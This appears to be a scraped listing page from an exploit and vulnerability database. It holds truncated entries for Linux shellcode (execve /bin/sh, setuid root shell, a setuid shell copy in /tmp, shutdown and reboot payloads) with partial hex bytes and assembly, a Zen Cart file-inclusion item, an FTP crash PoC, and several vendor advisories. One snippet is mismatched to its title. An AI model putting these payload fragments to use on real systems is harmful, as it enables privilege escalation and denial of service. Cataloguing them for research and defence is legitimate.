Solaris 2.6/7.0/8 netpr Buffer Overflow Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/1200/info A buffer overrun exists in the 'netpr' program, part of the SUNWpcu LP package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as...

Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes

No description provided by source. / Title: Linux/ARM - Polymorphic execve/bin/sh, /bin/sh, NULL; - XOR 88 encoded - 78 bytes Date: 2010-06-28 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Database of shellcodes...

Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability

No description provided by source. Zen Cart v1.3.9f typefilter Local File Inclusion Vulnerability Vendor: Zen Ventures, LLC Product web page: http://www.zen-cart.com Version affected: 1.3.9f Summary: Zen Cart is an online store management system. It is PHP-based, using a MySQL database and HTML...

Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode

No description provided by source. Linux/x8664 rebootPOWEROFF 19 bytes shellcode Date: 2010-04-25 Author: zbt Tested on: x8664 Debian GNU/Linux / ; rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDPOWEROFF section .text global start start: mov edx, 0x4321fedc mov esi, 0x28121969 mov edi,...

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes

No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes

No description provided by source. / Linux/x86 execve/bin/sh, /bin/sh, NULL - 25 bytes - [email protected] / char shellcode = \x31\xc0 // xor %eax, %eax \x50 // push %eax \x68\x2f\x2f\x73\x68 // push $0x68732f2f \x68\x2f\x62\x69\x6e // push $0x6e69622f \x89\xe3 // mov %esp, %ebx \x50 // push %eax...

linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes

No description provided by source. / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fork / include stdio.h char shellcode = \xeb\x5e\x5f\x31\xc0\x88\x47\x07\x88\x47\x0f\x88\x47\x19\x89\x7f \x1a\x8d\x77\x08\x89\x77\x1e\x31\xf6\x8d\x77\x10\x89\x77\x22\x89...

linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes

No description provided by source. / Linux/x86 setuid0 + execve/bin/sh, /bin/sh, NULL - 31 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // push $0xb \x58 // pop %eax \x52 //...

linux/x86 execve /bin/sh setreuid(12,12) 50 bytes

No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / \x29\xc0 / subl %eax, %eax / \xb0\x47 / movb $71, %al / \x29\xdb / subl %ebx, %ebx / / Here's the GI...

Linux x86 - execve /bin/sh - 21 bytes

No description provided by source. / execve /bin/sh - x86/linux - 21 bytes . zeroed argv / envp [email protected] [email protected] thanks : ivan, milo, oldschool crew / int main char sc = \x6a\x0b // push byte +0xb \x58 // pop eax \x99 // cdq \x52 // push edx...

linux/x86 mkdir() 'haxor' and exit() Shellcode - 39 bytes

/ ; Title: mkdir 'haxor' and exit Shellcode - 39 bytes ; Platform: linux/x8664 ; Date: 2014-06-26 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: jmp callshellcode shellcode: pop rsi xor rax, rax mov al, 0x53 mov rdi, rsi mov si, 0x1ed syscall xor rax, rax add...

linux/x86 shutdown -h now Shellcode - 56 bytes

/ ; Title: shutdown -h now Shellcode - 56 bytes ; Date: 2014-06-27 ; Platform: linux/x86 ; Author: Osanda Malith Jayathissa @OsandaMalith Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 31 d2 xor edx,edx 8048064: 50 push eax 8048065: 66 68 2d 68 pushw 0x682d 8048069: ...

Linux/x86 - shutdown -h now Shellcode (56 bytes)

Linux/x86 - shutdown -h now Shellcode 56 bytes. Shellcode exploit for Linuxx86 platform / ; Title: shutdown -h now Shellcode - 56 bytes ; Date: 2014-06-27 ; Platform: linux/x86 ; Author: Osanda Malith Jayathissa @OsandaMalith Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax...

openssl: freelist misuse causing a possible use-after-free

Race condition in the ssl3readbytes function in s3pkt.c in OpenSSL through 1.0.1g, when SSLMODERELEASEBUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service use-after-free and parsing error via an SSL connection in a multithreaded environment...

openssl: freelist misuse causing a possible use-after-free

Race condition in the ssl3readbytes function in s3pkt.c in OpenSSL through 1.0.1g, when SSLMODERELEASEBUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service use-after-free and parsing error via an SSL connection in a multithreaded environment...

Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure

Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure / source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to cause a memory leak to obtain sensitive...

Core FTP Server Version 1.2, build 535, 32-bit - Crash Poc

D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities. !/usr/bin/python import socket,sys,time def Usage: print "Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C....

MGASA-2014-0144 Updated stunnel package fixes security vulnerability

A flaw was found in the way stunnel, a socket wrapper which can provide SSL support to ordinary applications, performed reinitialization of PRNG after fork. When accepting a new connection, the server forks and the child process handles the request. The RANDbytes function of openssl doesn't reset...

Threat Outbreak Alert: Fake Malicious Attachment Notification Email Messages on February 4, 2014.

Medium Alert ID: 32724 First Published: 2014 February 5 13:13 GMT Version: 1 Summary Cisco Security has detected significant activity related to Portuguese-language spam email messages that claim to contain an attachment for the recipient. The text in the email message attempts to convince the...

OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417)

Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Embedded 7u45, and OpenJDK 7 allows remote attackers to affect integrity via unknown vectors related to Security. NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that...